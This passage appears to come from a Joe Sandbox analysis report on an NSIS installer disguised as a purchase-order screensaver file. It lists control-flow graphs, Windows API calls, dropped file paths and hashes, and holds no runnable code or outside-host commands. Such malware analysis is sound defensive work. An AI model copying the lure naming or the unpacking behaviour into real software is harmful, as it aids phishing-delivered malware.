                                                                                                      • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                                                                      • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                      • String ID: &B
                                                                                                      • API String ID: 3282139019-3208460036
                                                                                                      • Opcode ID: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                                                                                      • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                                                                      • Opcode Fuzzy Hash: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                                                                                      • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 277 40391f-403937 call 4062b2 280 403939-403949 call 405e8f 277->280 281 40394b-403982 call 405e15 277->281 290 4039a5-4039ce call 403bf5 call 405a9b 280->290 285 403984-403995 call 405e15 281->285 286 40399a-4039a0 lstrcatW 281->286 285->286 286->290 295 403a60-403a68 call 405a9b 290->295 296 4039d4-4039d9 290->296 301 403a76-403a9b LoadImageW 295->301 302 403a6a-403a71 call 405f6a 295->302 296->295 297 4039df-403a07 call 405e15 296->297 297->295 304 403a09-403a0d 297->304 306 403b1c-403b24 call 40140b 301->306 307 403a9d-403acd RegisterClassW 301->307 302->301 308 403a1f-403a2b lstrlenW 304->308 309 403a0f-403a1c call 4059c0 304->309 320 403b26-403b29 306->320 321 403b2e-403b39 call 403bf5 306->321 310 403ad3-403b17 SystemParametersInfoW CreateWindowExW 307->310 311 403beb 307->311 315 403a53-403a5b call 405993 call 405f48 308->315 316 403a2d-403a3b lstrcmpiW 308->316 309->308 310->306 313 403bed-403bf4 311->313 315->295 316->315 319 403a3d-403a47 GetFileAttributesW 316->319 323 403a49-403a4b 319->323 324 403a4d-403a4e call 4059df 319->324 320->313 330 403bc2-403bc3 call 4052c5 321->330 331 403b3f-403b5c ShowWindow LoadLibraryW 321->331 323->315 323->324 324->315 337 403bc8-403bca 330->337 333 403b65-403b77 GetClassInfoW 331->333 334 403b5e-403b63 LoadLibraryW 331->334 335 403b79-403b89 GetClassInfoW RegisterClassW 333->335 336 403b8f-403bb2 DialogBoxParamW call 40140b 333->336 334->333 335->336 341 403bb7-403bc0 call 40386f 336->341 339 403be4-403be6 call 40140b 337->339 340 403bcc-403bd2 337->340 339->311 340->320 342 403bd8-403bdf call 40140b 340->342 341->313 342->320
                                                                                                      APIs
                                                                                                        • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                                                                        • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                                                                        • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                                                                      • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76233420,00000000,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"), ref: 004039A0
                                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\googly\pulsation,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\googly\pulsation,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\googly\pulsation), ref: 00403A87
                                                                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                                                      • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                                                                      • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                      • String ID: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\googly\pulsation$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                                                      • API String ID: 914957316-3278138470
                                                                                                      • Opcode ID: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                                                                      • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                                                                      • Opcode Fuzzy Hash: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                                                                      • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 348 402dbc-402e0a GetTickCount GetModuleFileNameW call 405bb4 351 402e16-402e44 call 405f48 call 4059df call 405f48 GetFileSize 348->351 352 402e0c-402e11 348->352 360 402f34-402f42 call 402d1a 351->360 361 402e4a-402e61 351->361 353 40305b-40305f 352->353 367 403013-403018 360->367 368 402f48-402f4b 360->368 363 402e63 361->363 364 402e65-402e72 call 4032f9 361->364 363->364 372 402e78-402e7e 364->372 373 402fcf-402fd7 call 402d1a 364->373 367->353 370 402f77-402fc3 GlobalAlloc call 4063ce call 405be3 CreateFileW 368->370 371 402f4d-402f65 call 40330f call 4032f9 368->371 397 402fc5-402fca 370->397 398 402fd9-403009 call 40330f call 403062 370->398 371->367 400 402f6b-402f71 371->400 377 402e80-402e98 call 405b6f 372->377 378 402efe-402f02 372->378 373->367 382 402f0b-402f11 377->382 392 402e9a-402ea1 377->392 381 402f04-402f0a call 402d1a 378->381 378->382 381->382 387 402f13-402f21 call 406360 382->387 388 402f24-402f2e 382->388 387->388 388->360 388->361 392->382 399 402ea3-402eaa 392->399 397->353 408 40300e-403011 398->408 399->382 401 402eac-402eb3 399->401 400->367 400->370 401->382 403 402eb5-402ebc 401->403 403->382 405 402ebe-402ede 403->405 405->367 407 402ee4-402ee8 405->407 409 402ef0-402ef8 407->409 410 402eea-402eee 407->410 408->367 411 40301a-40302b 408->411 409->382 412 402efa-402efc 409->412 410->360 410->409 413 403033-403038 411->413 414 40302d 411->414 412->382 415 403039-40303f 413->415 414->413 415->415 416 403041-403059 call 405b6f 415->416 416->353
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,00000400), ref: 00402DEC
                                                                                                        • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,80000000,00000003), ref: 00405BB8
                                                                                                        • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,80000000,00000003), ref: 00402E35
                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                      • String ID: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase-Order27112024.scr.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$rQ$soft
                                                                                                      • API String ID: 2803837635-763302542
                                                                                                      • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                                                                      • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                                                                      • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                                                                      • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 545 401752-401777 call 402b3a call 405a0a 550 401781-401793 call 405f48 call 405993 lstrcatW 545->550 551 401779-40177f call 405f48 545->551 557 401798-401799 call 4061dc 550->557 551->557 560 40179e-4017a2 557->560 561 4017a4-4017ae call 40628b 560->561 562 4017d5-4017d8 560->562 570 4017c0-4017d2 561->570 571 4017b0-4017be CompareFileTime 561->571 564 4017e0-4017fc call 405bb4 562->564 565 4017da-4017db call 405b8f 562->565 572 401870-401899 call 4051f2 call 403062 564->572 573 4017fe-401801 564->573 565->564 570->562 571->570 587 4018a1-4018ad SetFileTime 572->587 588 40189b-40189f 572->588 574 401852-40185c call 4051f2 573->574 575 401803-401841 call 405f48 * 2 call 405f6a call 405f48 call 405724 573->575 585 401865-40186b 574->585 575->560 608 401847-401848 575->608 589 4029d0 585->589 591 4018b3-4018be CloseHandle 587->591 588->587 588->591 592 4029d2-4029d6 589->592 594 4018c4-4018c7 591->594 595 4029c7-4029ca 591->595 597 4018c9-4018da call 405f6a lstrcatW 594->597 598 4018dc-4018df call 405f6a 594->598 595->589 603 4018e4-402243 call 405724 597->603 598->603 603->592 608->585 610 40184a-40184b 608->610 610->574
                                                                                                      APIs
                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\googly\pulsation,?,?,00000031), ref: 00401793
                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\googly\pulsation,?,?,00000031), ref: 004017B8
                                                                                                        • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll), ref: 0040525F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsl791D.tmp$C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll$C:\Users\user\AppData\Local\googly\pulsation$Call
                                                                                                      • API String ID: 1941528284-3419546474
                                                                                                      • Opcode ID: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                                                                      • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                                                                      • Opcode Fuzzy Hash: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                                                                      • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 611 4051f2-405207 612 40520d-40521e 611->612 613 4052be-4052c2 611->613 614 405220-405224 call 405f6a 612->614 615 405229-405235 lstrlenW 612->615 614->615 617 405252-405256 615->617 618 405237-405247 lstrlenW 615->618 620 405265-405269 617->620 621 405258-40525f SetWindowTextW 617->621 618->613 619 405249-40524d lstrcatW 618->619 619->617 622 40526b-4052ad SendMessageW * 3 620->622 623 4052af-4052b1 620->623 621->620 622->623 623->613 624 4052b3-4052b6 623->624 624->613
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                      • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll), ref: 0040525F
                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll
                                                                                                      • API String ID: 2531174081-872693572
                                                                                                      • Opcode ID: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                                                                      • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                                                                      • Opcode Fuzzy Hash: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                                                                      • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 625 402573-402588 call 402b1d 628 4029c7-4029ca 625->628 629 40258e-402595 625->629 630 4029d0-4029d6 628->630 631 402597 629->631 632 40259a-40259d 629->632 631->632 634 4025a3-4025b2 call 405ea8 632->634 635 4026e6-4026ee 632->635 634->635 638 4025b8 634->638 635->628 639 4025be-4025c2 638->639 640 402657-402667 call 405c37 639->640 641 4025c8-4025e3 ReadFile 639->641 640->635 648 402669 640->648 641->635 642 4025e9-4025ee 641->642 642->635 644 4025f4-402602 642->644 646 4026a2-4026ae call 405e8f 644->646 647 402608-40261a MultiByteToWideChar 644->647 646->630 647->648 650 40261c-40261f 647->650 651 40266c-40266f 648->651 653 402621-40262c 650->653 651->646 654 402671-402676 651->654 653->651 655 40262e-402653 SetFilePointer MultiByteToWideChar 653->655 656 4026b3-4026b7 654->656 657 402678-40267d 654->657 655->653 660 402655 655->660 658 4026d4-4026e0 SetFilePointer 656->658 659 4026b9-4026bd 656->659 657->656 661 40267f-402692 657->661 658->635 663 4026c5-4026d2 659->663 664 4026bf-4026c3 659->664 660->648 661->635 662 402694-40269a 661->662 662->639 665 4026a0 662->665 663->635 664->658 664->663 665->635
                                                                                                      APIs
                                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                        • Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                      • String ID: 9
                                                                                                      • API String ID: 1149667376-2366072709
                                                                                                      • Opcode ID: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                                                                      • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                                                                      • Opcode Fuzzy Hash: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                                                                      • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 666 40317d-4031a6 GetTickCount 667 4032e7-4032ef call 402d1a 666->667 668 4031ac-4031d7 call 40330f SetFilePointer 666->668 673 4032f1-4032f6 667->673 674 4031dc-4031ee 668->674 675 4031f0 674->675 676 4031f2-403200 call 4032f9 674->676 675->676 679 403206-403212 676->679 680 4032d9-4032dc 676->680 681 403218-40321e 679->681 680->673 682 403220-403226 681->682 683 403249-403265 call 4063ee 681->683 682->683 685 403228-403248 call 402d1a 682->685 689 4032e2 683->689 690 403267-40326f 683->690 685->683 691 4032e4-4032e5 689->691 692 403271-403287 WriteFile 690->692 693 4032a3-4032a9 690->693 691->673 694 403289-40328d 692->694 695 4032de-4032e0 692->695 693->689 696 4032ab-4032ad 693->696 694->695 697 40328f-40329b 694->697 695->691 696->689 698 4032af-4032c2 696->698 697->681 699 4032a1 697->699 698->674 700 4032c8-4032d7 SetFilePointer 698->700 699->698 700->667
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00403192
                                                                                                        • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                      • WriteFile.KERNELBASE(0040BE90,004110A0,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                      • SetFilePointer.KERNELBASE(00004AF2,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
